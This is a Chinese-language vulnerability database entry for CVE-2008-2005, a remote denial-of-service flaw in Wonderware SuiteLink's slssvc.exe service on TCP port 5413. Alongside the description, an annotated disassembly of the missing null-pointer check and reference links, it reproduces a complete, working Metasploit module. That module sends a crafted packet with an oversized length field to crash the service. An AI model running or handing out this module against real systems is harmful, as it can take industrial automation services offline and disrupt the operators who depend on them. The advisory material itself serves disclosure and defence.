WonderWare SuiteLink slssvc.exe远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116139 漏洞类型 资源管理错误
发布时间 2008-09-17 更新时间 2008-09-17
CVE编号 CVE-2008-2005 CNNVD-ID CNNVD-200805-037
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/6474
https://www.securityfocus.com/bid/28974
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-037
|漏洞详情
WonderWare是一家工业自动化和信息软件解决方案的供应商。WonderWare在处理畸形请求数据时存在漏洞,远程攻击者可能利用此漏洞导致服务不可用。WonderWare的SuiteLink服务在5413/TCP端口上监听连接。连接到该服务的非认证客户端程序可以发送畸形报文,通过调用new()运算符导致内存分配操作失败并返回空指针。由于对内存分配操作的结果缺少错误检查,程序之后可能会使用空指针作为内存拷贝操作的目标,这可能触发内存访问异常并终止服务。攻击者可以通过在Registration报文中指定超大的长度字段来触发内存分配操作失败,以下二进制程序段说明漏洞起因:/-----------.text:00405C1Bmovesi,[ebp+dwLen];Ourvaluefrompacket....text:00405C20pushedi.text:00405C21testesi,esi;Checkvalue!=0....text:00405C31pushesi;Allocwithourlength.text:00405C32mov[ebp+var_4],0.text:00405C39calloperatornew(uint);BigvaluesreturnNULL.text:00405C3Emovecx,esi;Memcpywithourlength.text:00405C40movesi,[ebp+pDestionationAddr].text:00405C43mov[ebx+4],eax;newresultisusedasdest.text:00405C46movedi,eax;addresswithoutchecks..text:00405C48moveax,ecx.text:00405C4Aaddesp,4.text:00405C4Dshrecx,2.text:00405C50repmovsd;AVduetoinvalid.text:00405C52movecx,eax;destinationpointer..text:00405C54andecx,3------------/
|漏洞EXP
##
# $Id: suitlink.rb $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Wonderware SuitLink Denial of Service',
			'Description'    => %q{
				This module exploits a denial of service vulnerability
				within the SuitLink service in Wonderware products.
			},
			'Author'         => [ 'belay tows' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'BID', '28974' ],
					[ 'CVE', '2008-2005' ],
				],
			'DisclosureDate' => 'May 05 2008'))
			
			register_options([Opt::RPORT(5413),], self.class)
	end

	def run
		connect

		print_status("Sending DoS packet...")

        dos_length = 0xBAADF00D

		pkt =  "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
		pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
        pkt << [dos_length].pack("V")
	
        len = [pkt.length].pack("C")
		sock.put(len)
		
		sock.put(pkt)

        sleep 15 # wait to avoid thread shutdown event
		
		disconnect
	end

end
end	

# milw0rm.com [2008-09-17]
|受影响的产品
Wonderware SuiteLink 2.0
|参考资料

来源:US-CERT
名称:VU#596268
链接:http://www.kb.cert.org/vuls/id/596268
来源:XF
名称:suitelinkservice-slssvc-dos(42221)
链接:http://xforce.iss.net/xforce/xfdb/42221
来源:BID
名称:28974
链接:http://www.securityfocus.com/bid/28974
来源:BUGTRAQ
名称:20080505CORE-2008-0129-WonderwareSuiteLinkDenialofServicevulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/491623/100/0/threaded
来源:MILW0RM
名称:6474
链接:http://www.milw0rm.com/exploits/6474
来源:MISC
链接:http://www.coresecurity.com/?action=item&id=2187
来源:SECTRACK
名称:1019966
链接:http://www.securitytracker.com/id?1019966
来源:SECUNIA
名称:30063
链接:http://secunia.com/advisories/30063